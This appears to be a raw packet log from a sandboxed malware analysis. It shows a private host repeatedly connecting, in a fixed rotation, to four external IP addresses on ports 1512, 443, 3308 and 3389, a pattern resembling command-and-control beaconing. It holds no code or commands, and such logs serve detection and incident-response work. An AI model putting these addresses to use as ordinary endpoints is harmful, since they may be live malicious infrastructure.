Jan 12, 2021 07:43:39.668587923 CET	49177	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:39.721368074 CET	1512	49177	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:39.780570984 CET	49178	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:39.832896948 CET	443	49178	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:39.833054066 CET	49178	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:39.834526062 CET	49178	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:39.886719942 CET	443	49178	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:39.901704073 CET	443	49178	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:39.901876926 CET	49178	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:39.915092945 CET	49178	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:39.970079899 CET	443	49178	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:39.970361948 CET	49178	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:39.984234095 CET	49178	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:39.984416962 CET	49178	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:40.036942005 CET	443	49178	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:40.037070036 CET	49178	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:40.075099945 CET	443	49178	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:40.091238976 CET	443	49178	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:40.208693981 CET	443	49178	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:40.208753109 CET	443	49178	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:40.209119081 CET	49178	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:40.215033054 CET	49178	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:40.267312050 CET	443	49178	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:40.327421904 CET	49179	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:40.372363091 CET	3308	49179	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:40.372493982 CET	49179	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:40.374428988 CET	49179	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:40.417494059 CET	3308	49179	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:40.429721117 CET	3308	49179	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:40.429764986 CET	3308	49179	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:40.429907084 CET	49179	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:40.448699951 CET	49179	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:40.493685007 CET	3308	49179	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:40.493941069 CET	49179	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:40.506722927 CET	49179	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:40.506808043 CET	49179	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:40.549943924 CET	3308	49179	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:40.550266981 CET	49179	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:40.590344906 CET	3308	49179	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:40.593606949 CET	3308	49179	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:40.707290888 CET	3308	49179	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:40.707361937 CET	3308	49179	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:40.707602024 CET	49179	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:40.713982105 CET	49179	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:40.757061005 CET	3308	49179	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:40.824440002 CET	49180	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:40.878094912 CET	3389	49180	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:40.878194094 CET	49180	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:40.888799906 CET	49180	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:40.943305016 CET	3389	49180	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:40.959769011 CET	3389	49180	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:40.959794998 CET	3389	49180	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:40.959852934 CET	49180	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:40.959894896 CET	49180	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:40.970710039 CET	49180	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:41.029295921 CET	3389	49180	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:41.029520035 CET	49180	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:41.036374092 CET	49180	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:41.036483049 CET	49180	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:41.090179920 CET	3389	49180	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:41.090502977 CET	49180	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:41.130212069 CET	3389	49180	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:41.144017935 CET	3389	49180	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:41.144057989 CET	3389	49180	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:41.233715057 CET	3389	49180	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:41.233753920 CET	3389	49180	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:41.233998060 CET	49180	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:41.234057903 CET	49180	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:41.239512920 CET	49180	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:41.293344021 CET	3389	49180	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:41.363854885 CET	49181	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:41.416623116 CET	1512	49181	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:41.416711092 CET	49181	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:41.418188095 CET	49181	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:41.471743107 CET	1512	49181	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:41.478662014 CET	1512	49181	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:41.478684902 CET	1512	49181	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:41.478779078 CET	49181	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:41.485970020 CET	49181	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:41.539845943 CET	1512	49181	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:41.539922953 CET	49181	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:41.549402952 CET	49181	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:41.549714088 CET	49181	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:41.602577925 CET	1512	49181	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:41.602966070 CET	49181	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:41.641496897 CET	1512	49181	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:41.656014919 CET	1512	49181	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:41.756324053 CET	1512	49181	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:41.756373882 CET	1512	49181	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:41.756457090 CET	49181	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:41.756480932 CET	49181	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:41.762372971 CET	49181	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:41.815221071 CET	1512	49181	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:41.872631073 CET	49182	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:41.924916029 CET	443	49182	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:41.925185919 CET	49182	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:41.926851034 CET	49182	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:41.979058981 CET	443	49182	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:41.993721008 CET	443	49182	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:41.993804932 CET	49182	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:42.011250973 CET	49182	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:42.065758944 CET	443	49182	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:42.066020012 CET	49182	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:42.073448896 CET	49182	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:42.073575020 CET	49182	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:42.125529051 CET	443	49182	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:42.125746965 CET	49182	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:42.162956953 CET	443	49182	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:42.177730083 CET	443	49182	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:42.177900076 CET	443	49182	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:42.298417091 CET	443	49182	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:42.298479080 CET	443	49182	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:42.298696995 CET	49182	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:42.305628061 CET	49182	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:42.357777119 CET	443	49182	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:42.414382935 CET	49183	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:42.457669973 CET	3308	49183	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:42.457860947 CET	49183	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:42.458909988 CET	49183	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:42.502072096 CET	3308	49183	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:42.512754917 CET	3308	49183	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:42.512814045 CET	3308	49183	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:42.512867928 CET	49183	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:42.512902021 CET	49183	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:42.529603004 CET	49183	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:42.574537039 CET	3308	49183	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:42.574805021 CET	49183	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:42.581959963 CET	49183	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:42.582153082 CET	49183	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:42.625221014 CET	3308	49183	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:42.625437975 CET	49183	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:42.666009903 CET	3308	49183	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:42.668484926 CET	3308	49183	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:42.668498039 CET	3308	49183	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:42.781203032 CET	3308	49183	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:42.781255007 CET	3308	49183	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:42.781433105 CET	49183	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:42.785159111 CET	49183	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:42.828388929 CET	3308	49183	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:42.901271105 CET	49184	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:42.955416918 CET	3389	49184	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:42.955526114 CET	49184	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:42.957072020 CET	49184	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:43.010972977 CET	3389	49184	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:43.028953075 CET	3389	49184	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:43.028995991 CET	3389	49184	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:43.029093981 CET	49184	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:43.042279959 CET	49184	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:43.100598097 CET	3389	49184	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:43.100842953 CET	49184	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:43.113617897 CET	49184	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:43.113660097 CET	49184	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:43.167486906 CET	3389	49184	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:43.167823076 CET	49184	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:43.207221031 CET	3389	49184	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:43.221904993 CET	3389	49184	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:43.221951008 CET	3389	49184	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:43.312920094 CET	3389	49184	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:43.312972069 CET	3389	49184	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:43.313153028 CET	49184	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:43.319094896 CET	49184	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:43.373320103 CET	3389	49184	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:43.446897984 CET	49185	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:43.499937057 CET	1512	49185	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:43.500014067 CET	49185	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:43.501250982 CET	49185	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:43.554119110 CET	1512	49185	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:43.561263084 CET	1512	49185	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:43.561307907 CET	1512	49185	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:43.561347961 CET	49185	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:43.561392069 CET	49185	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:43.578094006 CET	49185	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:43.632394075 CET	1512	49185	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:43.632683039 CET	49185	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:43.645829916 CET	49185	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:43.646197081 CET	49185	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:43.699367046 CET	1512	49185	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:43.699466944 CET	49185	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:43.737499952 CET	1512	49185	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:43.752523899 CET	1512	49185	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:43.853818893 CET	1512	49185	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:43.853842974 CET	1512	49185	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:43.853888988 CET	49185	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:43.853929043 CET	49185	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:43.856162071 CET	49185	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:43.909028053 CET	1512	49185	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:43.959810019 CET	49186	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:44.012166023 CET	443	49186	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:44.012312889 CET	49186	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:44.013111115 CET	49186	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:44.065222979 CET	443	49186	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:44.079883099 CET	443	49186	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:44.079957008 CET	49186	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:44.090236902 CET	49186	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:44.144716978 CET	443	49186	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:44.144886971 CET	49186	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:44.151873112 CET	49186	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:44.152053118 CET	49186	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:44.204068899 CET	443	49186	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:44.204274893 CET	49186	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:44.242820978 CET	443	49186	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:44.256347895 CET	443	49186	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:44.375469923 CET	443	49186	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:44.375526905 CET	443	49186	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:44.375633001 CET	49186	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:44.382487059 CET	49186	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:44.434577942 CET	443	49186	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:44.487629890 CET	49187	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:44.530697107 CET	3308	49187	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:44.530762911 CET	49187	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:44.531507969 CET	49187	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:44.574553013 CET	3308	49187	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:44.585352898 CET	3308	49187	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:44.585371971 CET	3308	49187	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:44.585419893 CET	49187	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:44.598598957 CET	49187	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:44.643568993 CET	3308	49187	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:44.643640995 CET	49187	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:44.649848938 CET	49187	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:44.650058031 CET	49187	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:44.693129063 CET	3308	49187	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:44.693237066 CET	49187	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:44.733921051 CET	3308	49187	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:44.736217976 CET	3308	49187	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:44.736279964 CET	3308	49187	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:44.848999023 CET	3308	49187	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:44.849030018 CET	3308	49187	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:44.849133968 CET	49187	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:44.865695000 CET	49187	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:44.908963919 CET	3308	49187	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:44.976572990 CET	49188	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:45.030383110 CET	3389	49188	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:45.030483007 CET	49188	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:45.031294107 CET	49188	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:45.085228920 CET	3389	49188	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:45.102787971 CET	3389	49188	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:45.102809906 CET	3389	49188	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:45.102938890 CET	49188	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:45.112390995 CET	49188	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:45.172771931 CET	3389	49188	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:45.172920942 CET	49188	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:45.185939074 CET	49188	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:45.186188936 CET	49188	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:45.240031004 CET	3389	49188	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:45.240209103 CET	49188	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:45.279905081 CET	3389	49188	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:45.293848038 CET	3389	49188	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:45.293867111 CET	3389	49188	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:45.384953976 CET	3389	49188	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:45.384979010 CET	3389	49188	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:45.385123968 CET	49188	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:45.385191917 CET	49188	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:45.390007019 CET	49188	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:45.443623066 CET	3389	49188	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:45.503434896 CET	49189	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:45.556473017 CET	1512	49189	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:45.556605101 CET	49189	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:45.557450056 CET	49189	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:45.610325098 CET	1512	49189	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:45.617466927 CET	1512	49189	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:45.617486000 CET	1512	49189	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:45.617547035 CET	49189	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:45.630736113 CET	49189	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:45.684752941 CET	1512	49189	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:45.684907913 CET	49189	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:45.691816092 CET	49189	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:45.692048073 CET	49189	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:45.746639013 CET	1512	49189	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:45.746839046 CET	49189	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:45.781682014 CET	1512	49189	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:45.799632072 CET	1512	49189	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:45.799648046 CET	1512	49189	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:45.903306961 CET	1512	49189	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:45.903342962 CET	1512	49189	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:45.903517962 CET	49189	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:45.906922102 CET	49189	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:45.959774971 CET	1512	49189	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:46.017513037 CET	49190	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:46.069196939 CET	443	49190	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:46.069315910 CET	49190	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:46.070022106 CET	49190	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:46.121539116 CET	443	49190	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:46.137309074 CET	443	49190	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:46.137407064 CET	49190	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:46.143964052 CET	49190	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:46.197833061 CET	443	49190	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:46.198054075 CET	49190	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:46.209121943 CET	49190	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:46.209325075 CET	49190	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:46.260679007 CET	443	49190	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:46.260857105 CET	49190	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:46.298783064 CET	443	49190	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:46.312268972 CET	443	49190	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:46.312289000 CET	443	49190	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:46.430565119 CET	443	49190	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:46.430599928 CET	443	49190	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:46.430752039 CET	49190	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:46.434618950 CET	49190	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:46.485991001 CET	443	49190	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:46.548259974 CET	49191	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:46.591483116 CET	3308	49191	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:46.591630936 CET	49191	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:46.592874050 CET	49191	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:46.636020899 CET	3308	49191	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:46.647681952 CET	3308	49191	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:46.647723913 CET	3308	49191	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:46.647834063 CET	49191	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:46.661375999 CET	49191	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:46.706298113 CET	3308	49191	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:46.706516981 CET	49191	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:46.719563007 CET	49191	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:46.719949961 CET	49191	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:46.763158083 CET	3308	49191	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:46.763398886 CET	49191	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:46.804100990 CET	3308	49191	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:46.806618929 CET	3308	49191	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:46.806642056 CET	3308	49191	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:46.919215918 CET	3308	49191	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:46.919275999 CET	3308	49191	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:46.919409990 CET	49191	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:46.921565056 CET	49191	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:46.964679956 CET	3308	49191	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:47.036253929 CET	49192	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:47.090591908 CET	3389	49192	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:47.090708971 CET	49192	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:47.092266083 CET	49192	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:47.146627903 CET	3389	49192	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:47.162018061 CET	3389	49192	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:47.162059069 CET	3389	49192	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:47.162113905 CET	49192	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:47.162142992 CET	49192	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:47.175379038 CET	49192	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:47.235363960 CET	3389	49192	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:47.235598087 CET	49192	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:47.251055002 CET	49192	3389	192.168.2.22	5.100.228.233
